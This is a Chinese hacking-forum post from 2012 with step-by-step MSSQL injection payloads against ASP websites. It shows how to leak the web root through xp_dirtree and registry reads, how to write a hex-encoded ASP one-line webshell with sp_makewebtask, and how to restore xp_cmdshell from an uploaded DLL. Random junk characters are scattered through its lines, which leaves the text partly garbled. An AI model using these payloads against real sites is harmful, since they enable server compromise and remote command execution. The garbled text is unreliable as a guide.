中国网络渗透测试联盟

标题: MSsqlL注入取得网站路径最好的方法 [打印本页]

作者: admin    时间: 2012-9-13 17:20
标题: MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test') Q; G0 p" _6 {" d  S2 U7 m
假设我们在test里有两个文件夹test1和test2在test1里又有test3+ K5 y( m; z! B
结果显示
3 B! _& i$ [2 c* F) O( b" @
8 g3 [8 b6 h2 E, ~% c( usubdirectory depth4 Q& l( m) T" j% i7 I' e- F
test1 14 _" a3 I" ?! ~3 Q3 U, N5 B1 h; j( C) v
test3 2" L, ?/ j2 I% N# g0 v
test2 1/ n4 b' `( I' I% g1 p3 K0 f  A

( a/ e: b2 _/ V  B0 U# \哈哈发现没有那个depth就是目录的级数
5 X0 p& C7 t3 ~# a7 `" vok了,知道怎么办了吧
2 J0 ]4 d' ~+ T) f; X6 E
; R$ z5 C% y  }: H! `http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
5 ^" J  l- K% o% v% n1 h( ^1 _8 M. T5 phttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- 6 ^$ F4 G" ?: m( D& L9 f- G, _
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-0 C5 `+ X) @1 ~5 _  L( U

5 h( T. |2 C( @) P& y" N只要加上id=1,就是第一级目录 。1 }( u0 Z$ r6 u  {' T) l& I
" C- h) z' a7 Y' |

/ r, E2 j8 Q( |% R& Z% D通过注册表读网站路径:
5 v$ q( ]* {0 X+ i( L+ u! S2 t8 G& I8 g
1.;create table [dbo].[cyfd] ([gyfd][char](255));9 I7 p. d# K; F! j0 ~2 g

! X4 g  E. T2 `: J7 i' n, ?- A2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--; ]: \" E' R4 Q4 |/ p+ y
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
; r7 J) X+ }: ~5 _2 i$ L* d: `; ?, M
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
$ h. l+ n4 x* Y- g5 Dand 1=(select count(*) from cyfd where gyfd > 1)
' G+ T& b  ?" O% V  N. F7 X  `这样IE报错,就把刚才插进去的Web路径的值报出来了
& v$ F! y3 V2 t0 g+ q
$ g/ W- G" T6 c$ h5 y! |4.drop table cyfd;-- 删除临时表) N& M- Y- A* U6 b( |
& y$ I+ F0 U3 P% U9 ]& ?5 P8 j
获得webshell方法:; B, X  ?& C* J3 L) C& b& ~
1.create table cmd (a image)-- \**cmd是创建的临时表2 }7 \2 C! ]6 q3 s7 G/ U4 P
9 J% ~7 e% Z$ r2 z
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话# B3 v* ]  K* D: N1 O. R3 j! |
: ^4 P- r' X) L. k4 n

9 k& @' K" x& b2 Z' E& M  N) D# ~  J+ M. L3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd', o% N( m* E0 Z8 V; L5 ?
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
* W6 O0 A2 i* y1 M3 r0 t' O( z
( p9 }" H! j% p5 f* T* Z4.drop table cmd;-- 删除cmd临时表
: g' I4 _/ \2 E" C3 D5 i
, b+ \: V/ I& o8 l4 n$ f恢复xp_cmdshell方法之一:
/ Q2 `: b- G% W6 }我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:" g+ I' D, H" G" q1 Z% O
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
3 f6 H! i1 ?* H恢复,支持绝对路径的恢复哦。:)
  j0 J6 H" E- N( h$ h




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2